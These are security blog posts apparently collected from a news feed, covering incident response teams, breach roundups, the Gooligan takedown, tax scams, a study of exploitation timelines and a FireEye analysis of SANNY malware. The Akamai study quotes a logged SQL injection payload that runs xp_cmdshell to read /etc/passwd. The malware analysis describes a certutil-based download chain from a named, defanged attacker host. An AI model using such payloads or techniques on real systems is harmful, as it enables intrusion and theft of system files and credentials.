  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA

The post McAfee Safe Connect RT2Win Sweepstakes Terms and Conditions appeared first on McAfee Blogs.

CERTs, CSIRTs and SOCs after 10 years from definitions

Nowadays is hard to give strong definitions on what are the differences between Security Operation Centers (SOC), Computer Emergency Response Teams (CERT) and Computer Security Incident Response Teams (CSIRT) since they are widely used in many organisations accomplishing very closed and similar tasks. Robin Ruefle (2007) on her paper titled "Defining Computer Security Incident Response Teams" (Available here) gave us a nice idea. She also admits (at the end of the paper) there is not such a strong difference between those common terms: CSIRT, CERT, CSIRC, CIRT, IHT. Her conclusion made me thinking about how this topic has been evolving over the past 10 years.  

Despite her amazing work on defining (let me call) CSIRTs I would give you more details on how those teams have been evolving over the past decade based on my personal experiences directly to the field. Indeed after being involved on building several CERTs, organising CSIRTs and evaluating SOCs I started to spot strong and soft similarities between those teams. Today I'd like to share with you those strong and soft similarities without talking about "differences" since there are not evidence on differences at all.

Each team is asked for CyberSecurity incidents but each team holds specific aims and respond to cybersecurity incident in a specific way. Every team needs to understand what happened after a cybersecurity related incident and this is the very strong common point that every team takes care of: deeply understand what happened. Nobody is better then other or nobody is more addicted respect to other in understanding what really happened during an incident, every team have fully autonomy to figure out what happened through inspection and analytical skills.  The weak similarities come after the initial understanding (analysis) phase. CSIR Teams ad SOC Teams usually study the related incident looking for a response while CERT usually tries to forecast incidents. The definition of response highlight the "weak similarities" between CSIRT and SOC. 

CSIRT usually (but not necessary) look to the incident with a "business" perspective taking care of (but not limited to): communication countermeasures, policy creations, insurance calls, business impact analysis, technical skillset and off course taking care about technical mitigations. For example a CSIRT would evaluate according to the marketing area a communication strategy after a successful incident hit the company, or it could call insurances to evaluate if they will cover some damages or again it could interact to HR area to define missing skillsets in the organisation. Off course it is able to interact with defensive technologies but it's only one ste of its tasks.

A SOC usually (but not necessary) look to the incident with a more "technical" perspective taking care of (but not limited to): incident forensic, log analysis, vendor calls, patch distributions, vulnerability management and software/hardware tunings.  For example after an incident happened to an organisation its SOC would try to block it involving all its resources to block the threat by acting on peripheral devices or running commands directly on user's machines. The SOC deeply understands SIEM technology and it is able to improve it, it is also able to use and to interact through defensive teams and/or technology like sandboxes, proxy, WAF as well. The SOC team holds strong network oriented capabilities.

CER Teams usually take care about incidents following the community sharing procedures such as (but not limited to): feeds, bulletin, Index of Compromises and applying effective governance actions to local IT/SOC teams enabling them to mitigate the incident in the fastest way possibile. CERT team members work a lot with global incidents understanding new threats and tracking known threat movements. They usually work with Threat Intelligence Platforms and with high level dashboard to better understand the evolution of threats to forecast new attacks.

CERTs and SOCs are usually focused on prevention such as (but not limited to): what are the best rules to apply ? What are the procedures in case of incidents ? They are really focused on using threat intelligence in order to spot attack and to block incidents. On the other hand CERTs and CSIRTs are mostly focused on Guidelines and business impact analysis while SOCs and CSIRTs really need to follow incident response procedures in order to apply their high technical skills to mitigate the attack. The following image tries to highlight the main (but not the only) keywords that you would probably deal if you work on a SOC a CERT or in a CSIRT.

The main ideas (but not the only ones) behind the 3 teams could be summed up in the following terms: Mitigation (belongs to SOC), Response (belongs to CSIRT) and Alerting-Prevention (belongs to CERT). I'd like to point out that mitigation and response are quite different concepts. Indeed mitigation holds a technical view of the resolution, response holds a more business view of the resolution. While mitigating an incident means to "take it down" and so to restore the attacked system as it was before the incident, an incident response could include more sophisticated actions that could include the board of director in the decision process as well.
Similar teams but with strong attitudes need different professional profiles. Usually (but again not necessary) SOC Teams need more technical profiles which includes hard skills such as: vendor based certifications, network oriented attitudes and forensic attitudes. CSIRT teams needs a mixup profiles more oriented to technical skills but also with business view such as: risk evaluation, guideline buildings and communication skills. CERTs need to have a wide landscape vision about threats and for such a reason they need to know threat intelligence, they need to know prevention tools and to be part of strong IoC sharing communities. Developer skills are not mandatory on those teams but if "weak and dirty" scripting skills are in place, the entire team will benefit from them. Automation and integration are widely needed on such a teams and a scripting profile would create such an integrations.

As mentioned at the beginning of this "post" it is hard ...  almost impossible ... to give hard definitions about the evolution of "CSIRTs" but it's possible to observe strong and weak similarities in order to better understand what team is most suitable for every organisation.  If you belongs to a "CSIRT" or to a "SOC" or to a "CERT" and you feel like you are doing a little bit of each team according to my post, well, it is ok ! In ten years "things" have been changed a lot from the original definitions  and it's quite normal being involved in hybrid teams.

Weekly Cyber Risk Roundup: Orbitz Breach, Facebook Privacy Fallout

One of the biggest data breach announcements of the past week belonged to Orbitz, which said on Tuesday that as many as 880,000 customers may have had their payment card and other personal information compromised due to unauthorized access to a legacy Orbitz travel booking platform.

“Orbitz determined on March 1, 2018 that there was evidence suggesting that, between October 1, 2017 and December 22, 2017, an attacker may have accessed certain personal information, stored on this consumer and business partner platform, that was submitted for certain purchases made between January 1, 2016 and June 22, 2016 (for Orbitz platform customers) and between January 1, 2016 and December 22, 2017 (for certain partners’ customers),” the company said in a statement.

Information potentially compromised includes payment card information, names, dates of birth, addresses, phone numbers, email addresses, and gender.

As American Express noted in its statement about the breach, the affected Orbitz platform served as the underlying booking engine for many online travel websites, including and travel booked through Amex Travel Representatives.

Expedia, which purchased Orbitz in 2015, did not say how many or which partner platforms were affected by the breach, USA Today reported. However, the company did say that the current site was not affected.


Other trending cybercrime events from the week include:

  • State data breach notifications: Island Outdoor is notifying customers that payment card information may have been stolen due to the discovery of malware affecting several of its websites. Agemni is notifying customers about unauthorized charges after “a single authorized user of our software system used customer information to make improper charges for his personal benefit.” The Columbia Falls School District is notifying parents of a cyber-extortion threat involving their children’s personal information. Intuit is notifying TurboTax customers that their accounts may have been accessed by an actor leveraging previously leaked credentials. Taylor-Dunn Manufacturing Company is notifying customers that it discovered cryptocurrency mining malware on a server and that a file containing personal information of those registered for the Taylor-Dunn customer care or dealer center may have been accessed. Nampa School District is notifying a “limited number” of employees and Skamania Public Utility District is notifying customers that their personal information may have been compromised due to incidents involving unauthorized access to an employee email account.
  • Data exposed: A flaw in Telstra Health’s Argus software, which is used by more than 40,000 Australian health specialists, may have exposed the medical information of patients to hackers. Primary Healthcare is notifying patients of unauthorized access to four employee email accounts. More than 300,000 Pennsylvania school teachers may have had their personal information publicly released due to an employee error involving the Teacher Management Information System.
  • Notable ransomware attacks: The city of Atlanta said a ransomware attack disrupted internal and customer-facing applications, which made it difficult for citizens to pay bills and access court-related information. Atrium Hospitality is notifying 376 hotel guests that their personal information may have been compromised due to a ransomware infection at a workstation at the Holiday Inn Sacramento. Finger Lakes Health said it lost access to its computer system due to ransomware infection.
  • Other notable events: Frost Bank said that malicious actors comprised a third-party lockbox software program and were able to access images of checks that were stored in the database. National Lottery users are being advised to change their passwords after 150 accounts were affected by a “low-level” hack. A lawsuit against Internet provider CenturyLink and AT&T-owned DirecTV alleges that customer data was available through basic Internet searches.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week

2018-03-24_RiskScoresFacebook has faced a week of criticism, legal actions, and outcry from privacy advocates after it was revealed that the political consulting Cambridge Analytica had accessed the information of 50 million users and leveraged that information while working with the Donald Trump campaign in 2016.

“Cambridge Analytica obtained the data from a professor at the University of Cambridge who had collected the information by creating a personality-quiz app in 2013 that plugged into Facebook’s platform,” The Wall Street Journal reported. “Before a policy change in 2015, Facebook gave app creators and academics access to a treasure trove of data, ranging from which pages users liked to details about their friends.”

It isn’t clear how many other developers might have retained information harvested from Facebook before the 2015 policy change, The Journal reported. However, Mark Zuckerberg said the company may spend “many millions of dollars” auditing tens of thousands of data collecting apps in order to get a better handle on the situation.

The privacy breach has already led to regulatory scrutiny and potential lawsuits around the globe. Bloomberg reported that the FTC is probing whether data handling violated terms of a 2011 consent decree. In addition, Facebook said it would conduct staff-level briefings with six congressional committees in the coming week. Some lawmakers have called for Zuckerberg to testify as well, and Zuckerberg told media outlets that he would be willing to do so if asked.

Facebook’s stock price has dropped from $185 to $159 over the past eight days amid the controversy, and several companies have suspended their advertising on Facebook or deleted their Facebook pages altogether due to the public backlash.

Taking down Gooligan part 3 — monetization and clean-up

This post provides an in-depth analysis of Gooligan monetization schemas and recounts how Google took it down with the help of external partners.

This post is the final post of the series dedicated to the hunt and take down of Gooligan that we did at Google in collaboration with Check Point in November 2016. The first post recounts the Gooligan origin story and offers an overview of how it works. The second one provides an in-depth analysis of Gooligan’s inner workings and an analysis of its network infrastructure. As this post builds on the previous two, I encourage you to read them if you haven’t done so already.

This series of posts is modeled after the talk I gave on the subject at Botconf in December 2017. Here is a recording of the talk:

You can also get the slides here , but they are pretty bare.


Gooligan’s goal was to monetize the infected devices through two main fraudulent schemas: Ad fraud and Android app boosting.

Ad fraud

Gooligan Fraudulent ads pop up

As shown in the screenshot above, periodically Gooligan will use its root privileges to overlay an ad popup for a legitimate app on top of any activity the user was currently doing. Under the hood, Gooligan knows when the user is looking at the phone, as it monitors various key events, including when the screen is turned on.

We don’t have much insight on how effective those ad campaigns were or who was reselling them, as they don’t abuse Google’s ads network, and they use a gazillion HTTP redirects, which makes attribution close to impossible. However we believe that ad fraud was the main driver of Gooligan revenue, given its volume and the fact that we blocked its fake installs as discussed below.

App Boosting

The second way Gooligan attempted to monetize infected devices was by performing Android app boosting. An app boosting package is a bundle of searches for a specific query on the Play store, followed by an install and a review. The search is used in an attempt to rank the app for a given term. This tactic is commonly peddled in App Store Optimization (ASO) guides.

Example of Play Store boosting service

The reason Gooligan went through the trouble of stealing OAuth tokens and manipulating the Play store is probably that the defenses we put in place are very effective at detecting and discounting fake synthetic installs. Using real devices with real accounts was the Gooligan authors’ attempt to evade our detection systems. Overall, it was a total failure on their side: We caught all the fake installs, and suspended the abusive apps and developers.

Play Store Fraud Diagram

As illustrated in the diagram above, the app boosting was done in four steps:

  1. Token stealing: The malware extracts the phone’s long term token from the phone’s accounts.

  2. Taking order: Gooligan reports phone information to the central command and control system, and receives in response a reply telling it which app to boost, including which search term to use and which comment to leave (if any). Phone information is exfiltrated because Gooligan authors also had access to non-compromised phones and were trying to use information obtained from Gooligan to fake requests from those phones.

  3. Token exchange: The long term token is exchanged for a short term token that allows Gooligan to access the Play store. We are positive that no user data was compromised by Gooligan, as no other data was ever requested by Gooligan.

  4. Boosting: The fake search, installation, and potential review is carried out through the manipulated Play store app.


Cleaning up Gooligan was challenging for two reasons: First, as discussed in the infection post , its reset persistence mechanism meant that doing a factory reset was not enough to clean up the old unpatched devices. Second, the Oauth tokens had been exfiltrated to Gooligan servers.

Asking users to reflash their devices would have been unreasonable and issuing an OTA (Over The Air) update would have take too long. Given this difficult context and the need to act quickly to protect our users we went for an alternative solution that we rarely use: orchestrating a takedown with the help of third parties.


Gooligan sinkhole efficiency chart

With the help of Shadowserver foundation and domain registrars we sinkholed Gooligan domains and got them to point to Shadowserver controlled IPs instead of IPs controlled by Gooligan authors. This sinkholing ensured that infected devices couldn’t exfiltrate token or receive fraud commands, as they would connect to sinkhole servers instead of the real command and control servers. As shown in the graph above, our takedown was very successful: It blocked over 50M attempts to connect to Gooligan’s control server in 2017.


Example of Notifications sent to Gooligan victims

With the sinkhole in place, the second part of the remediation involved resecuring the accounts that were compromised, by disabling the exfiltrated tokens and notifying the users. Notification at that scale is very complex, for three key reasons:

  • Reaching users in a timely fashion across a wide range of devices is difficult. We ended up using a combination of SMS, email, and Android messaging, depending on what communication channel was available.

  • It was important to make the notification understandable and useful to all users. Explaining what was happening clearly and simply took a lot of iteration. We ended up with the notification shown in the screenshot above.

  • Once crafted, the text of the notification and help page had to be translated into the languages spoken by our users. Performing high quality internationalization for over 20 languages very quickly was quite a feat.


Overall, in order to respond to Gooligan, many people, including myself, ended up working long hours through the Thanksgiving weekend (an important holiday in the U.S.). Our commitment to quickly eradicate this threat paid off: On the evening of Monday, November 29th, the takedown took place, followed the next day by the resecuring of the compromised accounts. All in all, this takedown took a mere few days, which is blazing fast when you compare it to other similar ones. For example, the Avalanche botnet ) takedown took four years of intensive efforts.

To conclude, Gooligan was a very challenging malware to tackle, due to its scale and unconventional tactics. We were able to meet this challenge and defeat it, thanks to a cross-industry effort and the involvement of many teams at Google that didn’t go home until users were safe.

Thanks for reading this post all the way to the end. I hope it showcases how we approach botnet fighting and sheds some light on some of the lesser known, yet still critical, activities that our research team assists with.

Thank you for reading this post till the end! If you enjoyed it, don’t forget to share it on your favorite social network so that your friends and colleagues can enjoy it too and learn about Gooligan.

To get notified when my next post is online, follow me on Twitter , Facebook , Google+ , or LinkedIn . You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS .

A bientôt!

Don’t Get Duped: How to Spot 2018’s Top Tax Scams

It’s the most vulnerable time of the year. Tax time is when cyber criminals pull out their best scams and manage to swindle consumers — smart consumers — out of millions of dollars.

According to the Internal Revenue Service (IRS), crooks are getting creative and putting new twists on old scams using email, phishing and malware, threatening phone calls, and various forms of identity theft to gain access to your hard earned tax refund.

While some of these scams are harder to spot than others, almost all of them can be avoided by understanding the covert routes crooks take to access your family’s data and financial accounts.

According to the IRS, the con games around tax time regularly change. Here are just a few of the recent scams to be aware of:

Erroneous refunds

According to the IRS, schemes are getting more sophisticated. By stealing client data from legitimate tax professionals or buying social security numbers on the black market, a criminal can file a fraudulent tax return. Once the IRS deposits the tax refund into the taxpayer’s account, crooks then use various tactics (phone or email requests) to reclaim the refund from the taxpayer. Multiple versions of this sophisticated scam continue to evolve. If you see suspicious funds in your account or receive a refund check you know is not yours, alert your tax preparer, your bank, and the IRS. To return erroneous refunds, take these steps outlined by the IRS.

Phone scams

If someone calls you claiming to be from the IRS demanding a past due payment in the form of a wire transfer or money order, hang up. Imposters have been known to get aggressive and will even threaten to deport, arrest, or revoke your license if you do not pay the alleged outstanding tax bill.

In a similar scam, thieves call potential victims posing as IRS representatives and tell potential victims that two certified letters were previously sent and returned as undeliverable. The callers then threaten to arrest if a payment the victim does not immediately pay through a prepaid debit card. The scammer also tells the victim that the purchase of the card is linked to the Electronic Federal Tax Payment System (EFTPS) system.

Note: The IRS will never initiate an official tax dispute via phone. If you receive such a call, hang up and report the call to the IRS at 1-800-829-1040.

Robo calls

Baiting you with fear, scammers may also leave urgent “callback” requests through prerecorded phone robot or robo calls, or through a phishing email. Bogus IRS robo often politely ask taxpayers to verify their identity over the phone. These robo calls will even alter caller ID numbers to make it look as if the IRS or another official agency is calling.

Phishing schemes

Be on the lookout for emails with links to websites that ask for your personal information. According to the IRS, thieves now send very authentic-looking messages from credible-looking addresses. These emails coax victims into sharing sensitive information or contain links that contain malware that collects data.

To protect yourself stay alert and be wary of any emails from financial groups or government agencies Don’t share any information online, via email, phone or by text. Don’t click on random links sent to you via email. Once that information is shared anywhere, a crook can steal your identity and use it in different scams.

Human resource/data breaches

In one particular scam crooks target human resource departments. In this scenario, a thief sends an email from a fake organization executive. The email is sent to an employee in the payroll or human resources departments, requesting a list of all employees and their Forms W-2.  This scam is sometimes referred to as business email compromise (BEC) or business email spoofing (BES). 

Using the collected data criminals then attempt to file fraudulent tax returns to claim refunds. Or, they may sell the data on the Internet’s black market sites to others who file fraudulent tax returns or use the names and Social Security Numbers to commit other identity theft related crimes. While you can’t personally avoid this scam, be sure to inquire about your firm’s security practices and try to file your tax return early every year to beat any potentially false filing. Businesses/payroll service providers should file a complaint with the FBI’s Internet Crime Complaint Center (IC3).

As a reminder, the IRS will never:

  • Call to demand immediate payment over the phone, nor will the agency call about taxes owed without first having mailed you several bills.
  • Call or email you to verify your identity by asking for personal and financial information.
  • Demand that you pay taxes without giving you the opportunity to question or appeal the amount they say you owe.
  • Require you to use a specific payment method for your taxes, such as a prepaid debit card.
  • Ask for credit or debit card numbers over the phone or e-mail.
  • Threaten to immediately bring in local police or other law-enforcement groups to have you arrested for not paying.

If you are the victim identity, theft be sure to take the proper reporting steps. If you receive any unsolicited emails claiming to be from the IRS to (and then delete the emails).

This post is part II of our series on keeping your family safe during tax time. To read more about helping your teen file his or her first tax return, here’s Part I.

toni page birdsong



Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post Don’t Get Duped: How to Spot 2018’s Top Tax Scams appeared first on McAfee Blogs.

How to download your Facebook data

With all the news about Facebook recently, you might be wondering, what exactly does Facebook know about me from my profile? Sure, you can peruse your profile online, but that doesn’t tell the whole story. One way to see what Facebook has on you is to download your Facebook data.

The ability to download your Facebook data isn’t really new, but not many users know that you can do it. It only takes a few minutes; how long depends on how big your data files are. Here are the steps to download your Facebook data.

If you’ve decided that you want to leave Facebook completely, here’s how to delete, disable, or limit your Facebook account.

To read this article in full, please click here

You Stole My Sweater – Paul’s Security Weekly #552

Paul gives a tech segment on How to find the most innovative tech at a security show. In the news, we have updates from Alex Stamos, Facebook harvesting information about YOU, Uber self-driving car hits and kills pedestrian, and more on this episode of Paul's Security Weekly!

→Full Show Notes: 

→Visit for all the latest episodes!


Life Cycle of a Web App 0 Day


Over the past few months, I’ve been monitoring the proliferation of exploits for some of my disclosed WordPress Plugin and Joomla Extension vulnerabilities against Akamai customers. I started this observation process which leads to an expected conclusion – severe vulnerabilities like SQL Injection, RFI and LFI would receive the most attention for any CMS platform. While less severe vulnerabilities such as XSS and path disclosure would likely receive less attention from the attackers.

The initial idea was to track three of my own disclosures after they had been published and see how much time elapsed until they were weaponized and attempts were made to exploit them in the wild. In total, I had released three previously unknown SQL injection vulnerabilities in three well known Joomla extensions. These aforementioned vulnerabilities had been remedied by the original authors prior to research being published, These disclosures appeared to go unnoticed by the black hat community.

This paper examines the time elapsed between a when a vulnerability is publicly disclosed until we begin to observe widespread exploitation attempts by adversaries.

What Happened

The three disclosed vulnerabilities were released last September listed in the following table. Each advisory details a SQL Injection vulnerability that does not require the attacker to have a login on the target’s website:

DateDescriptionCVE ID
2016-09-16Huge-IT Portfolio Gallery Plugin v1.0.6CVE-2016-1000124
2016-09-15Huge-IT Video Gallery v1.0.9CVE-2016-1000123
2016-09-16Huge-IT Catalog v1.0.7 for Joomla

After nearly a year, I decided to investigate what might be causing my disclosures to be ignored. I looked at other SQL injection vulnerabilities in Joomla extensions that were turning up in Akamai’s attack logs and found an obvious difference. While my advisories had permeated the usual exploit curator websites, like, they had not made it over to, and Two days after submitting all three exploits to I found a hit in Akamai’s logs. The attack attempt originated from IP address belonging to a telecommunications company in North Africa. They were targeting a .mil website with the SQL injection in Huge IT portfolio v1.0.9 using SQLmap.

Path: ajax_url.php
Query: QmX=6156 AND 1=1 UNION ALL SELECT 1,NULL,'alert("XSS")',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')
User-Agent: sqlmap/ (

A second attack occurred five days later. This time the attacker targeted a Russian e-commerce site, by attempting to redirect the malicious requests through a popular online auction house. The requests appear to be looking for other injection points, since each request placed a single quote, ‘ at a different query parameter.

Query: option=com_catalog&_sacat=&_ex_kw='A=0&_mPrRngCbx=1&_udlo=&_udhi=&_sop=12&_fpos=&_fspt=1&_sadis=&LH_CAds=&task=viewitem&secid=13&id=34&Itemid=10&rmvSB=true


It seemed that the malicious actors would use exploit-db and CXsecurity websites specifically as their RSS feed of vetted working exploits. Conversely, while advisories published on packetstorm were quite relevant to the information security industry as a whole, they were not formatted into easily consumable exploits as curated by websites like exploit-db and their ilk. Not to leave the most popular CMS out of the fun I also publically disclosed a path traversal vulnerability in a WordPress plugin named Membership Simplified [CVE-2017-1002008]. I released the details on March 14th 2017 and began seeing entries in our logs on Saturday, March 18, 2017 at 9:00:00 PM just four days later. This response time was in stark contrast to my Joomla extension publications.

Why are newly disclosed WordPress plugin vulnerabilities so aggressively pursued? One possible theory is that there are multiple open source tools and frameworks available to scan for plugin vulnerabilities on WordPress websites. These freely available tools are lacking for the Joomla platform.

It is not just the severity of the vulnerability but the proliferation of the software platform that increases its target footprint. WordPress has an enormous market share of the content management software in production on the internet. There are entire frameworks, websites and even companies focused on WordPress core and plugin security.

What about a truly severe vulnerability? Something that doesn’t require authentication and allows the attacker to change content, possibly even execute code?

Earlier this year a researcher at Sucuri, Marc Montipas released a vulnerability affecting WordPress < 4 .7.2. The vulnerability abuses a type juggling bug where any non-integer input bypasses the authentication mechanism allowing a remote unauthenticated attacker to modify any blog post.

I started monitoring attack traffic, via Akamai log files, for this specific vulnerability immediately after it had been made public. The WordPress JSON API vulnerability was assigned CVE-ID CVE-2017-1001000. It first popped up in our attack logs on Wed, 01 Feb 2017 18:00:00 GMT or around 1PM EST just three hours after Sucuri made their blog post public on their site.

It only took three hours after the vulnerability went public to see exploit attempts against Akamai customers turning up in the logs. I’ve noticed the logs after a few months show only a few thousand attempts per day primarily targeting government and military websites. Also, most of the log entries were being generated by the customer themselves. In addition to this, large portions of these scans originate from security companies performing web application security assessments for said customers. The log entries that didn’t originate from a security company or the target’s own DMZ appeared to be POST requests rather than GET. This I assume to minimize noise and attempt to bypass WAF filters as there were many ways to deliver the JSON payload when exploiting this vulnerability.

Shortly after the disclosure by Marc and Securi an article was published stating that over 1.5 million websites had been compromised using this vulnerability. Why am I not seeing the same widespread exploitation attempts against Akamai customers? The answer was simple, the majority of Akamai customers aren’t running WordPress and the attackers were using google dorks to determine which sites were.

A google dork is an advanced search method used to increase Google’s search granularity. To get a quick idea on how many websites out there rely on WordPress I ran the following:

An example, searching google for urls that contain the string /wp-content:


Returns “About 280,000,000 results”.

In an attempt to further my examination of these attacks, I examined other exploits against Joomla, as it is the second most popular CMS employed by internet websites. I found that, again SQL injection and path traversal vulnerabilities were the most popular. the top of the Joomla examples are listed here, but I primarily focus on WordPress because of its deep penetration into the content management ecosystem.

I discovered with attacks focusing on Joomla extensions the majority of the traffic originated from Virtual Private Servers (VPS) and appeared to be legitimate attack attempts. The logs revealed the opposite for wordpress, the majority of attack attempts originated from the target’s DMZ and were self scans.


The com_rpl at the top of the above table is the result of an SQL injection via the pid parameter of a GET request in an extension called RealtyNA CRM (Client Relationship Management). This is designed to help Joomla based real estate websites manage inquiries on property for sale. The associated vulnerability was disclosed on December 15th 2016 and does not require the attacker to be authenticated to the site. It should be noted that the extension is no longer actively being maintained and has been pulled from Joomla’s code repository. The vendor RealtyNA has directed Joomla users towards its new WordPress plugin.

Most of the above Joomla extensions are vulnerable to SQL injection. When automated tools like SQLmap are used they iterate through various payload types in an attempt to build a working SQL injection exploit. This is why the numbers are much higher than the wordpress table below, SQLi attacks are much more noisier than XSS or RFI.

Besides software popularity, the type of exploit, for example, an “Unrestricted File Upload” vulnerability isn’t going to trigger a WAF alert unless a rule was specifically written for it. As an example, a file upload vulnerability can be more severe than an path traversal vulnerability but it is not likely to set off nearly as many alarms when it is being exploited as it’s harder to fingerprint being an error in the code logic itself. The exploit is a normal looking POST request void of any malicious content. Unless your file payload is something obvious like the notorious c99.php web shell.

With WordPress running on 28.7% of all websites and Joomla coming in at second place with 3.3% the availability of website security assessment applications also follows this trend. There are various utilities to assess the security of your WordPress and Joomla websites, a few are listed below that are popular.

Application NameCMSProject Page
Joomla VSJoomla

The majority of utilities out there appear to run on the command line, while some are directly integrated into your CMS installation.

The logs which I collected retain attack data for 30 days, I examined recently released vulnerabilities and well-known vulnerabilities to study the most scanned for a 30 day period. I filtered out known penetration testing companies from the logs and removed logs where the connection originated from the targets own network. The Alerts field contains the number of actual payloads that were blocked by Akamai’s WAF, they do not contain benign probe requests from web application vulnerability scanners.


When examining the log entries for the Jetpack WordPress plugin I expected to see in most of the entries an attempt to exploit SQL injection or a local file inclusion vulnerability. Or perhaps even the latest vulnerability in jetpack to be disclosed by Sucuri, a stored XSS vulnerability. The majority of the scans appeared to just verify if jetpack had been installed. If it was installed further checks were made for the existence of specific files like class.jetpack-xmlrpc-server.php or example.html, this it seems was an attempt to exploit CVE-2014-0173 a bypass vulnerability allowing unrestricted access to some of the RPC calls packaged with WordPress.

The majority of plugins being scanned for have been public for many months, in some cases years. Why do scans continue for legacy vulnerable plugins? The reason is vulnerability assessment tools scan for the existence of all known vulnerable plugins, usually by testing for a known specific file that it is packaged with.
Plugin Security – Now

I started re-evaluating plugin security a year later by using the same previous methodology of downloading plugins and manually examining the PHP code for common vulnerabilities like SQLi, XSS, LFI, and RFI. I found plugins that have not been updated in several months pose the most risk. I also discovered plugins with less than 1000 downloads but more than 100 haven’t been updated in an average of 991 days, as of the time of writing, or almost three years. The average plugin from my sample data hasn’t been updated in 1050 days.

# Plugin DownloadsAvg Days Since Last Update
9,999,999 - 1,000,000150
999,999 - 100,000458
99,999 - 10,000941
9,999 - 1,0001296
999 - 100991
< 99107*

* This is because these are newly uploaded plugins actively being developed.


When I originally began my research into the aforementioned type of widespread exploitation of recently published vulnerabilities I had some expectations as to how it would turn out. I had expected the same categories of vulnerabilities across all platforms to receive equal amounts of attention. What I found was that specific vulnerabilities like LFI were favored over other vulnerabilities that I had expected to be more popular such as SQL injection.

What I did not expect is the amount of traffic generated by widespread deployment of scanning tools by enterprise IT staff. While it appears the multiple routine daily self scans appear excessive, at least they’re focused on their own site’s security. With the proliferation of new vulnerability scanning tools becoming readily available it’s important that software is audited and vulnerabilities are reported responsibly, fixed and publicly disclosed. This cycle of research, repair and publish is the current best way to keep systems safe and secure.

The post Life Cycle of a Web App 0 Day appeared first on Liquidmatrix Security Digest.

The High Price of Not STFU: Guccifer 2.0 Reportedly Identified

Photo Credit: republica

Recently, we learned that it seems authorities have identified our friend, Guccifer 2.0. The main mechanism for this is that through Guccifer 2.0’s frequent communications via Twitter and ProtonMail, on one occasion he neglected to notice he was not connected to his favorite VPN service, Elite VPN. This means authorities were able to get his actual IP address when he was communicating openly while engaging in his portion of the influence operation.

Looking Ahead to RSA: Talking Open Source Components

The marquee event of the security industry is fast approaching – the 2018 RSA Conference will take place in San Francisco April 16 to 20. This is a highlight of the year for all of us at CA Veracode, and we will have a major presence there, in part because of the sheer size of this event – both in terms of attendance and scale. It’s definitely the leading business-focused security show, and we know that every AppSec vendor will be there, along with every AppSec practitioner from both a manager and purchasing perspective.

Why attend

Are you planning to attend? I always find this event valuable, and look forward to attending every year. In particular, I always come home with a new understanding of the current security problems that are top of mind for most organizations, and that they are trying to solve. Security is a fast-moving space, and both the problems and solutions are constantly evolving. For instance, when CA Veracode first started going to RSA, we spent a lot of time at the booth answering “what is application security?” Then in a few short years, we were fielding questions from attendees desperate for guidance on getting an AppSec program off the ground as soon as possible.

What I think will be a hot topic

This year, one of the problems I expect to hear a lot about is also the subject of my speaking session – the risk of open source components. We’re finding this is a top-of-mind issue among our customer base, and visibility is most often the crux of the issue. Developers have increasingly incorporated open source components into the code they’re writing, resulting in applications that today often feature more open source code than in-house code. In fact, 70 percent to 90 percent of Java applications are now made up of open source components. But what if there’s an announcement about a serious vulnerability in an open source component? Would you know if it’s in use in your organization? Most likely, you would not. In my speaking session, I’ll explore this problem and offer some practical tips on balancing the need for speed with the need for security.

Check out this short video featuring more of my thoughts on application security in general, and RSA in particular.

And find out more about CA Veracode’s presence at RSA this year.

Hope to see you there!

SANNY Malware Delivery Method Updated in Recently Observed Attacks


In the third week of March 2018, through FireEye’s Dynamic Threat Intelligence, FireEye discovered malicious macro-based Microsoft Word documents distributing SANNY malware to multiple governments worldwide. Each malicious document lure was crafted in regard to relevant regional geopolitical issues. FireEye has tracked the SANNY malware family since 2012 and believes that it is unique to a group focused on Korean Peninsula issues. This group has consistently targeted diplomatic entities worldwide, primarily using lure documents written in English and Russian.

As part of these recently observed attacks, the threat actor has made significant changes to their usual malware delivery method. The attack is now carried out in multiple stages, with each stage being downloaded from the attacker’s server. Command line evasion techniques, the capability to infect systems running Windows 10, and use of recent User Account Control (UAC) bypass techniques have also been added.

Document Details

The following two documents, detailed below, have been observed in the latest round of attacks:

MD5 hash: c538b2b2628bba25d68ad601e00ad150
SHA256 hash: b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4
Original Filename: РГНФ 2018-2019.doc

The document shown in Figure 1 discusses Eurasian geopolitics as they relate to China, as well as Russia’s security.

Figure 1: Sample document written in Russian

MD5 hash: 7b0f14d8cd370625aeb8a6af66af28ac
SHA256 hash: e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1
Original Filename: Copy of communication from Security Council Committee (1718).doc

The document shown in Figure 2 discusses sanctions on humanitarian operations in the Democratic People’s Republic of Korea (DPRK).

Figure 2: Sample document written in English

Macro Analysis

In both documents, an embedded macro stores the malicious command line to be executed in the TextBox property (TextBox1.Text) of the document. This TextBox property is first accessed by the macro to execute the command on the system and is then overwritten to delete evidence of the command line.

Stage 1: BAT File Download

In Stage 1, the macro leverages the legitimate Microsoft Windows certutil.exe utility to download an encoded Windows Batch (BAT) file from the following URL: http://more.1apps[.]com/1.txt. The macro then decodes the encoded file and drops it in the %temp% directory with the name: 1.bat.

There were a few interesting observations in the command line:

  1. The macro copies the Microsoft Windows certutil.exe utility to the %temp% directory with the name: ct.exe. One of the reasons for this is to evade detection by security products. Recently, FireEye has observed other threat actors using certutil.exe for malicious purposes. By renaming “certutil.exe” before execution, the malware authors are attempting to evade simple file-name based heuristic detections.
  2. The malicious BAT file is stored as the contents of a fake PEM encoded SSL certificate (with the BEGIN and END markers) on the Stage 1 URL, as shown in Figure 3.  The “certutil.exe” utility is then leveraged to both strip the BEGIN/END markers and decode the Base64 contents of the file. FireEye has not previously observed the malware authors use this technique in past campaigns.

Figure 3: Malicious BAT file stored as an encoded file to appear as an SSL certificate

BAT File Analysis

Once decoded and executed, the BAT file from Stage 1 will download an encoded CAB file from the base URL: hxxp://more.1apps[.]com/. The exact file name downloaded is based on the architecture of the operating system.

  • For a 32-bit operating system: hxxp://more.1apps[.]com/2.txt
  • For a 64-bit operating system: hxxp://more.1apps[.]com/3.txt

